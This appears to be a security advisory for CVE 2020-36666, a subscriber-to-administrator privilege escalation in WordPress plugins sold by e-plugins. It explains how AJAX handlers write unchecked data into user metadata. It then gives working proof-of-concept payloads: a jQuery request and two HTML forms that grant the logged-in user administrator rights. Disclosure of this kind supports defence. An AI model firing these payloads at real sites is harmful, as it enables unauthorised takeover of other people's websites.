Multiple e-plugins – Subscriber+ Privilege Escalation | CVE 2020-36666

Description

The plugins, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.

Proof of Concept

directory-pro (set current logged in user to admin)

jQuery.ajax({
    url: "http://localhost/wp-admin/admin-ajax.php",
    method: 'post',
    data: {
        action: "iv_directories_update_profile_setting",
        form_data: `wp_capabilities[administrator]=1`
    },
    success: function(res){
        console.log(res)
    }
});

<html>
  <body>
    <form action="http://[WP]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="iv_directories_update_profile_setting" />
      <input type="hidden" name="form_data" value="wp_capabilities[administrator]=1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


finaluser (edit user to set as admin):
<html>
  <body>
    <form action="http://[WP]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="ep_finaluser_update_user_settings" />
      <input type="hidden" name="form_data" value="user_role=administrator&payment_status=success&exp_date=&ep_status=publish&user_id=2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>